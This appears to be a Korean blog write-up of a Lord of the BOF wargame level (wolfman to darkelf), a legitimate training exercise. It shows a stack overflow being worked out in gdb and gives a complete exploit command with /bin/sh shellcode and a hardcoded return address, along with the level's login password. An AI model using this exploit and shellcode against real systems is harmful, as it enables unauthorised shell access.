[LOB Redhat] Lv.6 wolfman -> darkelf

문제를 풀기 위해 xshell로 로그인 해 주었다.

ID : wolfman / PW : love eyuna

가장 먼저 존재하는 파일들을 알아보기 위해 ls -l 명령어를 실행하였다.

darkelf.c 파일의 내용을 확인해 보자.

Lv.5에서 등장한 egghunter와 buffer hunter에 argv[1]의 길이를 검사하는 코드가 추가된 것을 볼 수 있다. 따라서 argv[2]에 쉘코드를 넣고 argv[1]에 RET이 argv[2]를 가리키도록 하여 공격을 해보려 한다.

일단 darkelf 파일을 복사한 뒤

gdb를 사용하여 main 함수의 어셈블리 코드를 살펴보자.

gdb를 통해 스택 상황을 아래와 같다고 생각해 볼 수 있다.

buffer	SFP	RET(return)
40	4	4

가장 먼저 argv[2]의 주소를 찾아야 한다. 따라서 strcpy 함수가 끝나는 지점에 bp를 걸고, 실행 인자로 "A"*44 + "\xbf\xbf\xbf\xbf"와 "B"*100을 따로 넘겨주었다.

인자를 넘겨줄 때, argv[1]에는 "A"를 argv[2]에는 "B"를 넘겨주었기 떄문에 x/1000x $esp 명령어를 사용하여 메모리에 쌓여있는 것을 확인할 때, 0x41414141에서 0x42424242으로 바뀌는 지점이 바로 argv[2] 주소의 시작이다.

역시 4141에서 4242로 바뀌는 부분이 있다. 또한 argv[2]의 주소도 "\xbf"로 시작하기 때문에 RET에 argv[2]의 주소를 넣어도 된다는 것을 확인할 수 있었다. (48byte의 자리가 "\xbf"가 되어야 실행할 수 있기 때문)

이제 "B"가 들어있는 주소 중 아무곳이나 하나 골라 쉘코드를 넣어주면 된다. 나는 "0xbffffc4c"로 정하였다.

사용할 코드의 구조는 다음과 같다.

기존 buffer + SFP (44byte)

argv[2]의 주소 : 0xbffffc4c

shellcode

이대로 공격 코드를 작성해 보았다.

./cpdarkelf `python -c 'print "A"*44 + "\x4c\xfc\xff\xbf" '`  `python -c 'print "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

코드를 실행시킨 결과 Segmentation flaut가 되며 core 파일이 생성되었다. core 파일을 분석해 보자.

역시 주소에서 차이가 있었던 것 같다.  주소를 "0xbffffbe0"으로 바꿔서 다시 실행해 보자.

쉘이 실행된다. 이제 원본파일에 공격해보자.

성공적으로 비밀번호를 알아내었다!